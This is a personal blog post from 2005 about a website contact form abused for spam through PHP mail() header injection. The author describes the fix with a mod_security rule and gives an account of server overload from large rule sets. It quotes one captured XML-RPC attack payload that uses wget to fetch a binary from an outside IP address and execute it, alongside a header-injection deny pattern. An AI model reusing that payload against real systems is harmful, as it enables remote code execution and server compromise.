Canned Spam

Posted In: Technology — December 23, 2005 @ 9:17 pm — Peter

We’ve been bit by a spammer using our contact page maliciously to send roughly 1000 email messages trying to sell software.

I suspected something was up when I received email messages containing MIME headers in the message body, but I brushed it off assuming I was protected because the “TO:” value is hard coded in the PHP script.

Shortly after, nicely formatted messages started rolling in that were hawking cheap software and were seemingly originating from our server. After inspecting the headers of one of the messages, I realized the contact page was being exploited and quickly locked it down using chmod.

After a bit of research, I see how the form was being exploited. The PHP mail function simply inserts text willy-nilly that is passed to it into the respective area of an email message. The spammer was packing the message body with MIME content that allowed for the specification of “BCC:” values. Oops, I really should have validated this input before passing it along to PHP mail(). Here is a great article the explaining the risks involved with using PHP mail() and other form mail processing technologies:

http://securephp.damonkohler.com/index.php/Email_Injection

I was tempted to wrap the form fields of the contact page with some regex to rid us of the annoying spammer, but that didn’t seem like a good solution. The article above mentioned a module for Apache web server called mod_security that acts as an application firewall preventing malformed data from reaching scripts and applications. After a bit more reading, I determined this module was right up my alley. I quickly installed it and devised the following rule to protect the contact page from MIME header injection:

SecFilterSelective "POST_PAYLOAD" ".*(content-disposition|to|cc|bcc|from|content-type|mime-version|content-transfer-encoding|subject)[[:space:]]*\:.*"

After doing some more research, I found a wonderful community of support sharing rules to thwart the hacking efforts of spammers and script kiddies. I’ve loaded a few rule bundles from http://gotroot.com/ and am pleased with the results. For example, this nasty hack attempt was caught shortly after loading the extensive rule sets:

< ?xml version="1.0"?>test.method ‘,”));echo ‘_begin_’;echo `cd /tmp;wget 209.136.48.69/mirela;chmod +x mirela;./mirela `;echo ‘_end_’;exit;/*

Of course this added security comes with quite a price tag in terms of CPU resources. Actually, the full package of rules from http://gotroot.com/ caused our server to seize up due to lack of free memory… It makes sense since each request must be aggressively inspected and compared against a massive rule base to determine if it is legitimate traffic.

Dec 23 18:47:16 eudora kernel: Free swap = 0kB
Dec 23 18:47:16 eudora kernel: Total swap = 522072kB
Dec 23 18:47:18 eudora kernel: Out of Memory: Killed process 11935 (httpd).

These log entries are from a postmortem analysis after our server became so overloaded that it would not respond to any sort of network connections. Perhaps I’ll resize the swap file, but I’d prefer to get a server with more RAM and CPU resources… Anyone want to donate some hardware to our lovely website? I’m hoping this server is still available for sale…

For the time being, I’ve trimmed the mod_security ruleset down to what I see being the most important lines of defense. Already our site seems to be more responsive and hopefully will remain safe against spammers and script kiddies.